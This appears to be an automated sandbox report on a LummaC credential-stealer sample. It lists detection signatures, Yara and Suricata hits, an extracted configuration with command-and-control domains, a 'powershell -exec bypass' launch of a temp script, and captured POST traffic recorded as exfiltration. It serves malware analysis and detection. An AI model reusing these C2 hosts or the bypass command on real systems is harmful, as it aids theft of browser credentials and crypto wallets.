Windows Analysis Report
#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Overview

General Information

Sample name: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe (renamed because original name is a hash value)
Original sample name: .exe
Analysis ID: 1601484
MD5: f86c1fb3a2c034c4d3d44a96fd9d6093
SHA1: eb478a69bc15b156a9ea0f0276e72788426b5b9e
SHA256: 10216641566ad9478b8aa7af136ee17959c8a4597b663ae379647f437f91f220
Tags: exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
  • System is w10x64
  • #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe" MD5: F86C1FB3A2C034C4D3D44A96FD9D6093)
    • powershell.exe (PID: 8004 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{
  "C2 url": [
    "abaft-taboo.bond",
    "noxiuos-utopi.bond",
    "moonehobno.bond",
    "rainy-lamep.bond",
    "elfinyamen.bond",
    "cowertbabei.bond",
    "learnyprocce.bond",
    "conquemappe.bond",
    "traveladdicts.top"
  ],
  "Build id": "MeHdy4--pl2yan1"
}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -

Source | Rule | Description | Author | Strings
00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x5311c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49; 0x566b2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security | -

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-28T16:15:57.972873+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.294730+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:01.039050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:13.829900+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:26.672332+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:40.165943+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:43.058158+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49773 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:57.101132+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49859 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:58.057907+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49865 | 104.26.3.16 | 443 | TCP
2025-01-28T16:15:58.771885+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.782405+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:57.561213+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49859 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:58.771885+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.782405+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:40.931548+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:43.064017+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 104.21.60.241 | 443 | TCP

AV Detection

Source: moonehobno.bond | Avira URL Cloud: Label: malware
Source: learnyprocce.bond | Avira URL Cloud: Label: malware
Source: rainy-lamep.bond | Avira URL Cloud: Label: malware
Source: noxiuos-utopi.bond | Avira URL Cloud: Label: malware
Source: abaft-taboo.bond | Avira URL Cloud: Label: malware
Source: cowertbabei.bond | Avira URL Cloud: Label: malware
Source: conquemappe.bond | Avira URL Cloud: Label: malware
Source: elfinyamen.bond | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["abaft-taboo.bond", "noxiuos-utopi.bond", "moonehobno.bond", "rainy-lamep.bond", "elfinyamen.bond", "cowertbabei.bond", "learnyprocce.bond", "conquemappe.bond", "traveladdicts.top"], "Build id": "MeHdy4--pl2yan1"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.6% probability
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: abaft-taboo.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: noxiuos-utopi.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: moonehobno.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rainy-lamep.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: elfinyamen.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cowertbabei.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: learnyprocce.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: conquemappe.bond
Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp | String decryptor: traveladdicts.top
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49865 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49773 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49859 -> 104.21.60.241:443
Source: Malware configuration extractor | URLs: abaft-taboo.bond
Source: Malware configuration extractor | URLs: noxiuos-utopi.bond
Source: Malware configuration extractor | URLs: moonehobno.bond
Source: Malware configuration extractor | URLs: rainy-lamep.bond
Source: Malware configuration extractor | URLs: elfinyamen.bond
Source: Malware configuration extractor | URLs: cowertbabei.bond
Source: Malware configuration extractor | URLs: learnyprocce.bond
Source: Malware configuration extractor | URLs: conquemappe.bond
Source: Malware configuration extractor | URLs: traveladdicts.top
Source: unknown | DNS query: name: rentry.co
Source: Joe Sandbox View | IP Address: 104.26.3.16
Source: Joe Sandbox View | IP Address: 104.21.60.241
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.21.60.241:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 104.26.3.16:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 104.21.60.241:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XCBEHHM26E12S5CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18147Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FB3100XCJPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8744Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2049G0Z2PZWMTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZ1454JTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2541Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QQWH8VW3RCPOZ95User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574203Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
Source: global traffic | DNS traffic detected: DNS query: traveladdicts.top
Source: global traffic | DNS traffic detected: DNS query: rentry.co
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Jan 2025 15:16:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Nl%2FOiUN2xBWBqiUNgSb5PT7VUdwXry3loUljxHyWscxM0Yzf2lafKKpUcYhRkA46s5qZCT799YYEFDaANaf7vlHpO7Z8AN3WqquBHRbUoAnR5s3z94LCCKZFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9091f2576b0b0f9f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1682&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1724748&cwnd=220&unsent_bytes=0&cid=349f066075c46494&ts=317&x=0"
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2477826670.0000000000875000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
